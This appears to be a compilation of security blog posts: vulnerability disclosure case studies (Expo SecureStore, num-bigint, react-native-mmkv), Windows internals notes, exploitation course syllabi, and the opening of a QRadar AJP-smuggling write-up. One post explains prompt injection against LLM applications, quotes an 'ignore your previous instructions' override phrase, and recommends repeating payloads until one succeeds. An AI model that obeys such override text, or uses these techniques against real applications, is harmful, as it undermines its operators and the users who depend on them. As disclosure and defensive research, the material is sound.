  String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP);
  int authenticationTagLength = gcmSpec.getTLen();

  JSONObject result = new JSONObject()
    .put(CIPHERTEXT_PROPERTY, ciphertext)
    .put(IV_PROPERTY, ivString)
    .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength);

  postEncryptionCallback.run(promise, result);

  return result;
}

Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java)

For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore.

An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST.

From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there.

The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits.

The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately.

Case 4: DoS vector in the num-bigint Rust library

In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE.

The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear.

But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails.

The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature:

use num_bigint::BigUint;
use std::io::Read;

fn main() -> std::io::Result<()> {
    let mut buf = Vec::new();
    let _ = std::io::stdin().read_to_end(&mut buf)?;
    let _: BigUint = bincode::deserialize(&buf).unwrap_or_default();
    Ok(())
}

Figure 3: Example deserialization format

It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed.

impl<'de> Visitor<'de> for U32Visitor {
    type Value = BigUint;

    {...omitted for brevity...}

    #[cfg(not(u64_digit))]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        let len = seq.size_hint().unwrap_or(0);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }

    #[cfg(u64_digit)]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        use crate::big_digit::BigDigit;
        use num_integer::Integer;

        let u32_len = seq.size_hint().unwrap_or(0);
        let len = Integer::div_ceil(&u32_len, &2);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }
}

Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108)

We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4.

Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv

The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark.

During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv library caught my attention. The following code shows the problematic log statement:

MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path,
                               std::string cryptKey) {
  __android_log_print(ANDROID_LOG_INFO, "RNMMKV",
                      "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)",
                      instanceId.c_str(), path.c_str(), cryptKey.c_str());
  std::string* pathPtr = path.size() > 0 ? &path : nullptr;
  {...omitted for brevity...}

Figure 5: Code that initializes MMKV and also logs the encryption key

Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled.

With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install.

This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process.

Takeaways

GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers).

The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls.

However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness.

Step 1: Add a security policy

Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability.

GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root.

We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following:

We have multiple channels for receiving reports:

* If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to [email protected]

Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly.

Step 2: Enable private reporting

Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies.

Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require.

After configuring the notifications, go to the “Security” tab of your repository and click “Enable vulnerability reporting”:

Emails about reported vulnerabilities have the subject line “(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this:

If you want to enable private reporting for your whole organization, then check out this documentation.

A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically.

On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub.

This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design.

Step 3: Get notifications via webhooks

If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type:

After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability.

How to make security researchers happy

If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day.

If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting.

If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.

Windows Internals Notes

I spent some time over the Christmas break least year learning the basics of Windows Internals and thought it was a good opportunity to use my naive reverse engineering skills to find answers to my own questions. This is not a blog but rather my own notes on Windows Internals. I’ll keep updating them and adding new notes as I learn more.

Windows Native API

As mentioned on Wikipedia, several native Windows API calls are implemented in ntoskernel.exe and can be accessed from user mode through ntdll.dll. The entry point of NTDLL is LdrInitializeThunk and native API calls are handled by the Kernel via the System Service Descriptor Table (SSDT).

The native API is used early in the Windows startup process when other components or APIs are not available yet. Therefore, a few Windows components, such as the Client/Server Runtime Subsystem (CSRSS), are implemented using the Native API.  The native API is also used by subroutines from Kernel32.DLL and others to implement Windows API on which most of the Windows components are created.

The native API contains several functions, including C Runtime Function that are needed for a very basic C Runtime execution, such as strlen(); however, it lacks some other common functions or procedures such as malloc(), printf(), and scanf(). The reason for that is that malloc() does not specify which heap to use for memory allocation, and printf() and scans() use a console which can be accessed only through Kernel32.

Native API Naming Convention

Most of the native APIs have a prefix such as Nt, Zw, and Rtl etc. All the native APIs that start with Nt or Zw are system calls which are declared in ntoskernl.exe and ntdll.dll and they are identical when called from NTDLL.

  • Nt or Zw: When called from user mode (NTDLL), they execute an interrupt into kernel mode and call the equivalent function in ntoskrnl.exe via the SSDT. The only difference is that the Zw APIs ensure kernel mode when called from ntoskernl.exe, while the Nt APIs don’t.[1] 
  • Rtl: This is the second largest group of NTDLL calls. It contains the (extended) C Run-Time Library, which includes many utility functions that can be used by native applications but don’t have a direct kernel support.
  • Csr: These are client-server functions that are used to communicate with the Win32 subsystem process, csrss.exe.
  • Dbg: These are debugging functions such as a software breakpoint.
  • Ki: These are upcalls from kernel mode for events like APC dispatching.
  • Ldr: These are loader functions for Portable Executable (PE) file which are responsible for handling and starting of new processes.
  • Tp: These are for ThreadPool handling.

Figuring Out Undocumented APIs

Some of these APIs that are part of Windows Driver Kit (WDK) are documented but Microsoft does not provide documentation for rest of the native APIs. So, how can we find the definition for these APIs? How do we know what arguments we need to provide?

As we discussed earlier, these native APIs are defined in ntdll.dll and ntoskernl.exe. Let’s open it in Ghidra and see if we can find the definition for one of the native APIs, NtQueryInformationProcess().

Let’s load NTDLL in Ghidra, analyse it, and check exported functions under the Symbol tree:

Well, the function signature doesn’t look good. It looks like this API call does not accept any parameters (void) ? Well, that can’t be true, because it needs to take at least a handle to a target process.

Now, let’s load ntoskernl.exe in Ghidra and check it there.

Okay, that’s little bit better. We now at least know that it takes five arguments. But what are those arguments? Can we figure it out? Well, at least for this native API, I found its definition on MSDN here. But what if it wasn’t there? Could we still figure out the number of parameters and their data types required to call this native API?

Let’s see if we can find a header file in the Includes directory in Windows Kits (WinDBG) installation directory.

As you can see, the grep command shows the NtQueryInformationProcess() is found in two files, but the definition is found only in winternl.h.

Alas, we found the function declaration! So, now we know that it takes 3 arguments (IN) and returns values in two of the structure members (OUT), ReturnLength and ProcessInformation.

Similarly, another native API, NtOpenProcess() is not defined in NtOSKernl.exe but its declaration can be found in the Windows driver header file ntddk.h.

Note that not all Native APIs have function declarations in user mode or kernel mode header files and if I am not wrong, people may have figured them out via live debug (dynamic analysis) and/or reverse engineering.

System Service Descriptor Table (SSDT)

Windows Kernel handles system calls via SSDT and before invoking a syscall, a SysCall number is placed into EAX register (RAX in case of 64 bit systems). It then checks the KiServiceTable from Kernel’s address space for this SysCall number.

For example, SysCall number for NtOpenProcess() is 0x26. we can check this table by launching WinDBG in local kernel debug mode and using the dd nt!KiServiceTable command.

It displays a list of offsets to actual system calls, such as NtOpenProcess(). We can check the syscall number for NtOpenProcess() by making the dd command display the 0x27th entry from the start of the table (It’s 0x26 but the table index starts at 0).

As you can see, adding L27 to the dd nt!KiServiceTable command displays the offsets for up to 0x26 SysCalls in this table. We can now check if offset 05f2190 resolves to NtOpenProcess(). We can ignore the last bit of this offset, 0. This bit indicates how many stack parameters need to be cleaned up post the SysCall.

The first four parameters are usually pushed to the registers and remaining are pushed to the stack. We have just one bit to represent number of parameters that can go onto the stack, we can represent maximum 0xf parameters.

So in case of NtOpenProcess, there are no parameters on the stack that need to be cleaned up. Now let’s unassembled the instructions at nt!KiServiceTable + 05f2190 to see if this address resolves to SysCall NtOpenProcess().

References / To Do

https://en.wikipedia.org/wiki/Windows_Native_API

https://web.archive.org/web/20110119043027/http://www.codeproject.com/KB/system/Win32.aspx

https://web.archive.org/web/20070403035347/http://support.microsoft.com/kb/187674

https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

https://learn.microsoft.com/en-us/windows/win32/api/

https://techcommunity.microsoft.com/t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824

Windows Device Driver Documentation: https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/_kernel/

Process Info, PEB and TEB etc: https://www.codeproject.com/Articles/19685/Get-Process-Info-with-NtQueryInformationProcess

https://www.microsoftpressstore.com/articles/article.aspx?p=2233328

Offensive Windows Attack Techniques: https://attack.mitre.org/techniques/enterprise/

https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/exploring-process-environment-block

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Masquerade-PEB.ps1

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

Windows Drivers Reverse Engineering Methodology

Public Report – Confidential Mode for Hyperdisk – DEK Protection Analysis

During the spring of 2024, Google engaged NCC Group to conduct a design review of Confidential Mode for Hyperdisk (CHD) architecture in order to analyze how the Data Encryption Key (DEK) that encrypts data-at-rest is protected. The project was 10 person days and the goal is to validate that the following two properties are enforced:

  • The DEK is not available in an unencrypted form in CHD infrastructure.
  • It is not possible to persist and/or extract an unencrypted DEK from the secure hardware-protected enclaves.

The two secure hardware-backed enclaves where the DEK is allowed to exist in plaintext are:

  • Key Management System HSM – during CHD creation (DEK is generated and exported wrapped) and DEK Installation (DEK is imported and unwrapped)
  • Infrastructure Node AMD SEV-ES Secure Enclave – during CHD access to storage node (DEK is used to process the data read/write operations)

NCC Group evaluated Confidential Mode for Hyperdisk – specifically, the secure handling of Data Encryption Keys across all disk operations including:

  • disk provisioning
  • mounting
  • data read/write operations

The public report for this review may be downloaded below:

Non-Deterministic Nature of Prompt Injection 

As we explained in a previous blogpost, exploiting a prompt injection attack is conceptually easy to understand: There are previous instructions in the prompt, and we include additional instructions within the user input, which is merged together with the legitimate instructions in a way that the underlying model cannot distinguish between them. Just like what happens with SQL Injection. “Ignore your previous instructions and…” is the new “ AND 1=0 UNION …” in the post-LLM world, right? Well… kind of, but not that much. The big difference between the two is that an SQL database is a deterministic engine, whereas an LLM in general is not (except in certain specific configurations), and this makes a big difference on how we identify and exploit injection vulnerabilities.

When detecting an SQL Injection, we build payloads that include SQL instructions and observe the response to learn more about the injected SQL statement and the database structure. From those responses we can also identify if the injection vulnerability exists, as a vulnerable application would respond differently than expected.

However, detecting a prompt injection vulnerability introduces an additional layer of complexity due to the non-deterministic nature of most LLM setups. Let’s imagine we are trying to identify a prompt injection vulnerability in an application using the following prompt (shown in OpenAI’s Playground for simplicity):

Example of failing prompt injection exploitation.

In this example, “System” refers to the instructions within the prompt that are invisible and immutable to users; “User” represents the user input, and “Assistant” denotes the LLM’s response. Clearly, the user input exploits a prompt injection vulnerability by incorporating additional instructions that supersede the original ones, compelling the application to invariably respond with “Secure.” However, this payload fails to work as anticipated because the application responds with “Insecure” instead of the expected “Secure,” indicating unsuccessful prompt injection exploitation. Viewing this behavior through a traditional SQLi lens, one might conclude the application is effectively shielded against prompt injection. But what happens if we repeat the same user input multiple times?

Example of successful prompt injection exploitation.

In a previous blogpost, we explained that the output of an LLM is essentially the score assigned to each potential token from the vocabulary, determining the next generated token. Subsequently, various parameters, including “temperature” and beam size, are employed to select the next generated token. Some of these parameters involve non-deterministic processes, resulting in the model not always producing the same output for the same input.

Slide of a presentation showing how the next character is chosen under the hood.

This non-deterministic behavior influences how a model responds to inputs that include a prompt injection payload, as illustrated in the example above. Similar behavior might be observed if you have experimented with LLM CTFs, wherein a payload effective for a friend does not appear to work for you. It is likely not a case of your friend cheating; instead, they might just be luckier. Repeating the payload several times might eventually lead to success.

Another factor where the exploitation of prompt injection differs significantly from SQLi exploitation is that of LLM hallucinations. It is not uncommon for a response from an LLM to include a hallucination that may deceive one into believing an injection was successful or had more of an impact than it actually did. Examples include receiving an invented list of previous instructions or expanding on something that the attacker suggested but does not actually exist.

Consequently, identifying prompt injection vulnerabilities should involve repeating the same payloads or minor variations thereof multiple times, followed by verifying the success of any attempt. Therefore, it is crucial to consult with your security vendor about the maximum number of connections they can utilize and how the model is configured to yield deterministic responses. The less deterministic the model and the fewer connections the target service permits, the more time will be needed to achieve comprehensive coverage. If the prompt template and instructions are available, it aids in pinpointing hallucinations and other similar behaviors, which lead to false positives.

Acknowledgements

Special thanks to Thomas Atkinson and the rest of the NCC Group team that proofread this blogpost before being published.

Vulnerability Assessment Course – Summer 2024

This course introduces vulnerability analysis and research with a focus on Ndays. We start with understanding security risks and discuss industry-standard metrics such as CVSS, CWE, and Mitre Attack. Next, we explore the outcome of what a detailed analysis of a CVE contains including vulnerability types, attack vectors, source and binary code analysis, exploitation, and detection and mitigation guidance. In particular, we shall discuss how the efficacy of high-fidelity detection schemes is predicated on gaining a thorough understanding of the vulnerability and exploitation avenues.

Next, we look at the basics of reversing by introducing tools such as debuggers and disassemblers. We look at various bug classes and talk about determining risk just from the title and metadata of a CVE. It will be noted that predicting the severity and exploitability of a vulnerability requires knowledge about the common bug classes and exploitation techniques. To this end, we shall perform deep-dive analyses of a few CVEs that cover different bug classes such as command injection, insecure deserialization, SQL injection, stack- and heap buffer overflows, and other memory corruption vulnerabilities.

Towards the end of the training, the attendee can expect to gain familiarity with several vulnerability types, research tools, and be aware of utility and limitations of detection schemes.

 

Emphasis

To prepare the student to fully defend the modern enterprise by being aware and equipped to assess the impact of vulnerabilities across the breadth of the application space.

 

Prerequisites

  • Computer with ability to run a virtual machines (recommended 16GB+ memory)
  • Some familiarity with debuggers, Python, C/C++, x86 ASM. IDA Pro or Ghidra experience a plus.

**No prior vulnerability discovery experience is necessary

 

Course Information

Attendance will be limited to 25 students per course.

Cost: $4000 USD per attendee

Dates:  July 9 – 12, 2024

Location:  Washington, D.C.

 

Syllabus

Vulnerability and risk assessment

  • Nday risk and patching timelines
  • Vulnerability terminology: CVE, CVSS, CWE, Mitre Attack, Impact, Category
  • Risk assessment
  • Vulnerability mitigation

Binary and code analysis

  • Reverse engineering tools such as debuggers, disassemblers
  • Deep dive into command injection, SQL injection, insecure deserialization with case studies and hands-on practical.
  • Deep dive into buffer overflow and other memory corruption vulnerabilities with case studies and hands-on practical.

Analysis Enrichment

  • Qualitative risk assessment
  • Patch analysis
  • Understanding mitigation techniques
  • Writing detection guidance

The post Vulnerability Assessment Course – Summer 2024 appeared first on Exodus Intelligence.

Public Mobile Exploitation Training – Summer 2024

This 4 day course is designed to provide students with both an overview of the Android attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, binary instrumentation, and advanced exploitation of widely deployed mobile platforms.

Taught by Senior members of the Exodus Intelligence Mobile Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands on with privilege escalation techniques within the Android Kernel, mitigations and execution migration issues with a focus on MediaTek chipsets.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 8GB+ memory)
  • Some familiarity with: IDA Pro, Python, C/C++.
  • ARM assembly fluency strongly recommended.
  • Installed and usable copy of IDA Pro 6.1+, VirtualBox, Python.

Course Information

Attendance will be limited to 12 students per course.

Cost: $5000 USD per attendee

Dates:  July 15 – 18, 2024

Location:  Washington, D.C.

 

 

Syllabus

Android Kernel

  • Process Management
    • Important structures
    • Memory Management
  • Kernel Synchronization
  • Memory Management
    • Virtual memory
    • Memory allocators
  • Debugging Environment
    • Build the kernel
    • Boot and Root the kernel
    • Kernel debugging
  • Samsung Knox/RKP
  • SELinux
  • Type of kernel vulnerabilities
    • Exploitation primitives
    • Kernel vulnerabilities overview
    • Heap overflows, use-after-free, info leakage
  • Double-free vulnerability (radio)
    • Exploitation – convert the double free into a use-after-free of a struct page
  • Double-free vulnerability (untrusted_app)
    • Vulnerability overview
    • Technique 1: type confusion to obtain write access to globally shared memory
    • Technique 2: UaF that can lead to arbitrary RW in kernel memory

Mediatek / Exynos baseband

  • Introduction
    • Exynos baseband overview
    • Mediatek baseband overview
  • Environment
  • Previous research
  • Analysis of the modem
  • Emulation / Fuzzing
  • Rogue base station
  • Secure boot
  • Mediatek boot rom vulnerability
    • Vulnerability overview
    • Exploitation
    • Using brom exploit to patch the tee
  • Baseband debugger
    • Write the modem physical memory from EL1
  •  
  •  

The post Public Mobile Exploitation Training – Summer 2024 appeared first on Exodus Intelligence.

Public Browser Exploitation Training – Summer 2024

This 4 day course is designed to provide students with both an overview of the current state of the browser attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, and advanced exploitation of widely deployed browsers such as Google Chrome.

Taught by Senior members of the Exodus Intelligence Browser Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands on with privilege escalation techniques within the JavaScript implementations, JIT optimizers and rendering components.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 8GB+ memory)
  • Prior experience in vulnerability research, but not necessarily with browsers.

Course Information

Attendance will be limited to 18 students per course.

Cost: $5000 USD per attendee

Dates:  July 15 – 18, 2024

Location:  Washington, D.C.

 

 

Syllabus

  • JavaScript Crash Course
  • Browsers Overview
    • Architecture
    • Renderer
    • Sandbox
  • Deep Dive into JavaScript Engines and JIT Compilation
    • Detailed understanding of JavaScript engines and JIT compilation
    • Differences between major JavaScript engines (V8, SpiderMonkey, JavaScriptCore)
  • Introduction to Browser Exploitation
    • Technical aspects and techniques of browser exploitation
    • Focus on JavaScript engine and JIT vulnerabilities
  • Chrome ArrayShift case study
  • JIT Compilers in depth
    • Chrome/V8 Turbofan
    • Firefox/SpiderMonkey Ion
    • Safari/JavaScriptCore DFG/FTL
  • Types of Arrays
  • v8 case study
    • Object in-memory layout
    • Garbage collection
  • Running shellcode
    • Common avenues
    • Mitigations
  • Browser Fuzzing and Bug Hunting
    • Introduction to fuzzing
    • Pros and cons of fuzzing
    • Fuzzing techniques for browsers
    • “Smarter” fuzzing
  • Current landscape
  • Hands-on exercises throughout the course
    • Understanding the environment and getting up to speed
    • Analysis and exploitation of a vulnerability

The post Public Browser Exploitation Training – Summer 2024 appeared first on Exodus Intelligence.

IBM QRadar - When The Attacker Controls Your Security Stack (CVE-2022-26377)

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

Welcome to April 2024.

A depressing year so far - we've seen critical vulnerabilities across a wide range of enterprise software stacks.

In addition, we've seen surreptitious and patient threat actors light our industry on fire with slowly introduced backdoors in the XZ library.

Today, in this iteration of 'watchTowr Labs takes aim at yet another piece of software' we wonder why the industry panics about backdoors in libraries that have taken 2 years to be unsuccessfully introduced - while security vendors like IBM can't even update libraries used in their flagship security products that subsequently allow for trivial exploitation.

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

Over the last few weeks, we've watched the furor and speculation run rife on Twitter and LinkedIn;

  • Who wrote the XZ backdoor?
  • Which APT group was it?
  • Which country do we blame?
  • Could it happen again?

We sat back and watched the industry discuss how they would solve future iterations of the XZ backdoor - presumably in some sort of parallel universe - because in the one we currently exist in, IBM - a key security vendor - could not even update a dependency in it's flagship security software to keep it secure.

Seriously, what are we doing?

Anyway, we're back at it - sit back, enjoy the mayhem - and join us on this journey into IBM's QRadar.

What is QRadar?

For the uninitiaited on big blue, or those that have just been spared numerous traumatic experiences having to ever configure a SIEM - as mentioned above, QRadar is IBM's crown-jewel, flagship security product.

For those unfamiliar with defensive security products, QRadar is the mastermind application that can sit on-premise or in the cloud via IBM's SaaS offering. Quite simply, it's IBM's Security Information and Event Management (SIEM) product - and is the heart of many enterprise's security software stack.

A (SIEM) solution is a centralised system for monitoring logs ingested from all sorts of endpoints (for example: employee laptops, servers, IoT devices, or cloud environments). These logs are analysed using a defined ruleset to detect potential security incidents.

Has a web shell been deployed to an application server? Has a Powershell process been spawned on the marketing teams' laptops? Is your Domain Controller communicating with Pastebin? SIEMs ingest and analyse alerts, data, and telemetry - and provide feedback alerts to a Blue Team operator to inform them of potential security events.

Should a threat actor manage to compromise a SIEM in an enterprise environment, they'd be able to "look down all the CCTV cameras in the warehouse," so to speak.

With the ability to manipulate records of potential security incidents or to view logs (which all too often contain cleartext credentials) and session data, it is clear how this access permits an attacker to cripple security team capabilities within an organisation.

Obtaining a license for QRadar costs thousands of dollars, but fortunately for us, QRadar is available for download as an installation on-premise in the form of AWS AMI's (BYOL) and a free Community Edition Virtual machine.

Typically, QRadar is deployed within an organisations internal environment - as you'd expect for the management console for a security product - but, a brief internet search reveals that thousands of IBM's customers had "better ideas".

When first reviewing any application for security deficiencies, the first step is to enumerate the routes available. The question posed; where can we, as pre-authenticated users, touch the appliance and interact with its underlying code?

We’re not exaggerating when we state that a deployment of IBM’s QRadar is a behemoth of a solution to analyse- to give some statistics of the available routes amongst the thousands of files, we found a number of paths to explore:

  • 5 .war Files
    • Containing 70+ Servlets
  • 468 JSP files
  • 255 PHP Files
  • 6+ Reverse ProxyPass’s
  • seemingly-infinite defined APIs (as we'd expect for a SIEM)

Each route takes time to meticulously review to e its purpose (and functionality, intentional or otherwise).

Our first encounter with QRadar was back in October of 2023; we spent a number of weeks diving into each route available, extracting the required parameters, and following each of their functions to look for potential security vulnerabilities.

To give some initial context on QRadar, the core application is accessed via HTTPS over port 443, which redirects to the endpoint /console . When reviewing the Apache config that handles this, we can see this is filtered through a ProxyPass rule over the ajp:// protocol to an internal service running on port 8009:

ProxyPass /console/ ajp://localhost:8009/console/

For those new to AJP (Apache JServ Protocol), it is a binary-like protocol for interacting with Java applications instead of a human-readable protocol like HTTP. It is harder for humans to read, but it has similarities, such as parameters and headers.

In the context of QRadar, users typically don’t have direct access to the AJP protocol. Instead, they access it indirectly, sending an HTTP request to /console URI. Anything after this /console endpoint is translated from an HTTP request to an AJP binary packet, which is then actioned by the Java code of the application.

FWIW, it’s considered bad security practice to allow direct access to the AJP protocol, and with good reason - you only have to look at the infamous GhostCat vulnerability that allowed Local File Read and, in some occasions, Remote Code Execution, for an example of what can go wrong when it is exposed to malicious traffic.

Below is an example viewed within WireShark that shows a single HTTP request to a /console endpoint. We can see that this results in a single AJP packet being issued. It’s important to note, for later on, the ‘one request to one packet’ ratio - every HTTP request results in exactly one set of AJP packets.

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

While the majority of servlets and .jsp endpoints reside within the console.war file, these can’t be accessed from a pre-authenticated perspective. As readers will imagine - this is no bueno.

Sadly, in our first encounter - we came up short. The reality of research is that this happens, but as any one that is jaded enough by computers and research will know - we kept meticulous notes, including a Software Bill of Materials (SBOM), in case we needed to come back.

It's a new dawn, it's a new day, it's a new life

Before getting into our current efforts here in 2024, let's discuss something that was brought to light back in 2022 - a then-new class of vulnerability defined as “AJP Smuggling”.

A researcher known as “RicterZ” released their insight and a PoC into an AJP smuggling vulnerability (CVE-2022-26377), which, in short, demonstrates that it is possible to smuggle an AJP packet via an HTTP request containing the header Transfer-Encoding: Chunked, Chunked, and with the request body containing the binary format of the AJP packet. This smuggled AJP request is passed directly to the AJP protocol port should a corresponding Apache ProxyPass rule have been configured.

This was deemed a vulnerability in mod_proxy_ajp, and the assigned CVE is accompanied by the following description:

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.

The impact of this vulnerability was mostly theoretical until a real-world example came to our attention at the start of 2024. This example came in the form of CVE-2023-46747, a compromise of BigIP’s F5 product, achieved using the same AJP smuggling technique.

Here, researchers leveraged the original vulnerability, as documented by RicterZ. This allowed a request to be smuggled to the AJP protocol’s backend, exposing a new attack surface of previously-restricted functionality. This previously-restricted but now-available functionality allowed an unauthenticated attacker to add new a new administrative account to an F5 BigIP device.

Having familiarised ourselves with both the aforementioned F5 BigIP vulnerability and RicterZ’s work, we set out to reboot our QRadar instance to see if our new knowledge was relevant to its implementation of AJP in the console application.

A quick version check of the deployed httpd binary tells us we’re up against Apache 2.4.6, which is a bit newer than the supposedly vulnerable version fo Apache that contained a vulnerable version of mod_proxy_ajp.

